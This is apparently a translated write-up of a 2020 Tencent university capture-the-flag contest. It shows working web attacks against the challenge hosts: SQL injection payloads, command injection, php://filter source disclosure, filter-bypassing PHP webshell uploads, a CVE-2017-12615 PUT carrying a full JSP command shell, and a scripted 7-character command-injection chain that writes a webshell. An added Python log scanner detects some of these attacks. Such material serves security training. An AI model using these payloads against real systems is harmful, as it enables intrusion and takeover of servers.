2020 Tencent Rhino-Bird Cybersecurity T-Star College Challenge (腾讯犀牛鸟网络安全T-Star高校挑战赛)

2020-07-02

Preface

Masters Gq and hhhm are way too strong (tql).

Sign-in

Key point: the image extension is only validated by front-end JavaScript.

Upload a jpg, then intercept the request, change the extension to php and forward it; the file content is a one-line webshell (一句话木马).

The key directory contains key{K735c9f0D7ddc3b9}.

Report Card

Enter the following in the input box, one at a time:

0' union select 1,2,3,database()--
0' union select 1,2,3,table_name from information_schema.tables where table_schema='web1'#
0' union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'#
0' union select 1,2,3,flag from fl4g#

Command Execution Basics

baidu.com | cat  ../key.php

Can You Brute-Force It?

  • Brute-forced with burpsuite: both the username and the password are admin. A successful login sets a cookie whose value is the base64 of the username.

  • payload

-admin"union select 1,(select group_concat(flag) from flag),3-- 

  • base64

LWFkbWluInVuaW9uIHNlbGVjdCAxLChzZWxlY3QgZ3JvdXBfY29uY2F0KGZsYWcpIGZyb20gZmxhZyksMy0tIA==

File Inclusion GetShell

First, the source code is read from lfi.txt:

<?php
$file = $_REQUEST['file'];
if ($file != '') {
    $inc = sprintf("%s.php", $file); // only php file can be included
    include($inc);
}
?>

Use a PHP stream wrapper (伪协议) directly; the appended ".php" does not stop php://filter from reading the target:

file=php://filter/read=convert.base64-encode/resource=flag

File Upload

  • `<?`, `php`, `eval` and similar keywords are filtered. The filter is simple and just replaces each match with an empty string, so writing the keyword twice (double-writing) bypasses it; for eval, PHP's case-insensitive function names get around the filter.

  • payload

<php?<?p<?phphp EVAL($_POST['cmd']);?>

Then change the extension to .pht and the file can be uploaded. The file size is limited to 20kb-100kb, so just upload it padded together with an image. After connecting with AntSword (蚁剑), flag{Aa3c7c37508E40B3} is found under key.

Kitten Steps on the Light Bulb (小猫咪踩灯泡)

The challenge gives a hint:

  • CVE-2017-12615

Capture the request, change GET to PUT, append a jsp filename with a trailing slash, and upload the shell:

PUT /kawhi.jsp/ HTTP/1.1
Host: 012c8bc2.yunyansec.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 20 Jun 2019 10:03:08 GMT
If-None-Match: W/"5619-1561024988000"
Cache-Control: max-age=0
Content-Length: 666

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

List the root directory:

http://012c8bc2.yunyansec.com/kawhi.jsp?&pwd=023&cmd=ls

The flag file is found, so read it:

http://012c8bc2.yunyansec.com/kawhi.jsp?&pwd=023&cmd=cat%20flag.txt
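The three techniques used so far in this writeup (the php://filter wrapper in the file-inclusion challenge, the CVE-2017-12615 PUT to a `.jsp/` path, and the UNION-based injection from the report-card challenge) each leave a recognisable trace in the web server's access log. The script below is an added example written for this page, not part of the original writeup or of any challenge; it runs a few constructed Apache-style log lines (IPs and paths are made up) through simple detection rules a defender could adapt.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache-style access log lines (not from the original writeup).
SAMPLE_LOG = """\
10.0.0.5 - - [02/Jul/2020:10:00:01 +0800] "GET /index.php?file=about HTTP/1.1" 200 512
10.0.0.5 - - [02/Jul/2020:10:00:02 +0800] "GET /index.php?file=php://filter/read=convert.base64-encode/resource=flag HTTP/1.1" 200 1024
10.0.0.6 - - [02/Jul/2020:10:00:03 +0800] "PUT /kawhi.jsp/ HTTP/1.1" 201 0
10.0.0.7 - - [02/Jul/2020:10:00:04 +0800] "GET /score.php?id=0%27%20union%20select%201,2,3,database()-- HTTP/1.1" 200 300
10.0.0.8 - - [02/Jul/2020:10:00:05 +0800] "GET /kawhi.jsp?pwd=023&cmd=ls HTTP/1.1" 200 200
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_tomcat_put(method, path, query):
    # CVE-2017-12615 style upload: a PUT of a .jsp resource (often with a trailing "/").
    return method == "PUT" and ".jsp" in path.lower()

def is_php_wrapper(method, path, query):
    # A PHP stream wrapper in a parameter value points at source disclosure
    # or code inclusion through include()/require().
    return re.search(r"\b(php|data|expect|phar)://", query, re.I) is not None

def is_sqli_union(method, path, query):
    # UNION-based injection or information_schema enumeration in the decoded query.
    return re.search(r"\bunion\b\s+(all\s+)?\bselect\b|information_schema", query, re.I) is not None

RULES = [
    ("tomcat-put-jsp", is_tomcat_put),
    ("php-wrapper-include", is_php_wrapper),
    ("sqli-union", is_sqli_union),
]

def scan_log(text):
    """Return (client_ip, rule_name, method, path) for every matching line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common/combined log format
        parts = urlsplit(m["target"])
        path, query = unquote(parts.path), unquote(parts.query)
        for name, rule in RULES:
            if rule(m["method"], path, query):
                findings.append((m["ip"], name, m["method"], path))
    return findings
```

The fifth sample line (the GET with `pwd` and `cmd` parameters) is deliberately not matched: spotting an already-planted shell needs a different signal, such as alerting on any successful PUT or on new files appearing in the webroot.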

Analyze the Code to Get the Flag

The challenge gives the source code directly:

<?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<7){
     echo shell_exec($_GET[1]);
}
?>

Background

For details, see the referenced links (传送门 传送门).

The limit here is 7 characters per command.

The payload is the one from 仕廷大佬's writeup:

>l\\
>s\ \\
ls>_
>\ \\
>-t\\
>\>y
ls>>_

The idea, as I understand it, is to first build _, then use _ to build ls -t>y, and then use ls -t>y to build our webshell.

webshell

>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
sh _
sh y

Script to send the payloads

import requests
url = "http://86568f48.yunyansec.com/?1={0}"
print("[+]start attack!!!")
with open("payload.txt","r") as f:
    for i in f:
        print("[*]" + url.format(i.strip()))
        requests.get(url.format(i.strip()))
# check whether the attack succeeded
test = requests.get("http://86568f48.yunyansec.com/1.php")
if test.status_code == requests.codes.ok:
    print("[*]Attack success!!!")

Then the information can be viewed:

http://86568f48.yunyansec.com/1.php?1=phpinfo();

To connect with AntSword (蚁剑), a POST-based shell has to be written first:

http://86568f48.yunyansec.com/1.php?1=eval($_POST['cmd']);

flag{a1c8BFF2} can be found in key one directory up.
